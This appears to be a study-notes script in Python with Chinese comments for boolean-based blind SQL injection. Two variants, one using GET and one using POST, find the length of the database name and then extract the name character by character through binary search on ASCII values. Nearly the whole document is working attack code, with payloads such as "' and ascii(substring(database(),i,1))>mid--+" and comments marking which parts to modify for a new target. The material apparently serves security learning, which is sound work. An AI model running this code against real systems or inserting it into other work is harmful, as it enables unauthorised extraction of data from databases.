def get_db_length(): """获取数据库名长度""" for i in range(1, 30): # 对应基础笔记:id=1' and length(database())=4 --+ payload = f"' and length(database())={i}--+" target = url + payload res = requests.get(target) if true_flag in res.text: print(f"[+] 数据库长度为: {i}") return i return 0
def get_db_name(length): """利用二分法获取数据库名""" db_name = "" for i in range(1, length + 1): low = 32 # 可见字符 ASCII 下限 high = 126 # 可见字符 ASCII 上限 while low <= high: mid = (low + high) // 2 # 对应基础笔记:id=1' and ascii(substring(database(),1,1))>97 --+ payload = f"' and ascii(substring(database(),{i},1))>{mid}--+" target = url + payload res = requests.get(target) if true_flag in res.text: # 页面正常,说明 ASCII 码大于 mid,区间右移 low = mid + 1 else: # 页面异常,说明 ASCII 码小于等于 mid,区间左移 high = mid - 1 db_name += chr(low) print(f"[*] 当前爆破进度: {db_name}") print(f"[+] 最终数据库名为: {db_name}")
if __name__ == "__main__": length = get_db_length() if length > 0: get_db_name(length)
def get_db_length(): """获取数据库名长度""" for i in range(1, 30): # 构造 Payload,注意要包含原始的查询值(比如这里的 1)和闭合符号 payload = f"1' and length(database())={i}--+" # 【关键修改点 3】构造 POST 的数据体 (字典格式) # 如果需要同时 POST 多个参数(如密码),可以直接加在这个字典里 # 例如: {inject_param: payload, "password": "123"} data = { inject_param: payload } # 【关键修改点 4】使用 requests.post(),并通过 data 参数传递数据 res = requests.post(url, data=data) if true_flag in res.text: print(f"[+] 数据库长度为: {i}") return i return 0
def get_db_name(length): """利用二分法获取数据库名""" db_name = "" for i in range(1, length + 1): low = 32 # 可见字符 ASCII 下限 high = 126 # 可见字符 ASCII 上限 while low <= high: mid = (low + high) // 2 payload = f"1' and ascii(substring(database(),{i},1))>{mid}--+" data = { inject_param: payload } res = requests.post(url, data=data) if true_flag in res.text: # 页面正常,说明 ASCII 码大于 mid,区间右移 low = mid + 1 else: # 页面异常,说明 ASCII 码小于等于 mid,区间左移 high = mid - 1 db_name += chr(low) print(f"[*] 当前爆破进度: {db_name}") print(f"[+] 最终数据库名为: {db_name}")
if __name__ == "__main__": length = get_db_length() if length > 0: get_db_name(length)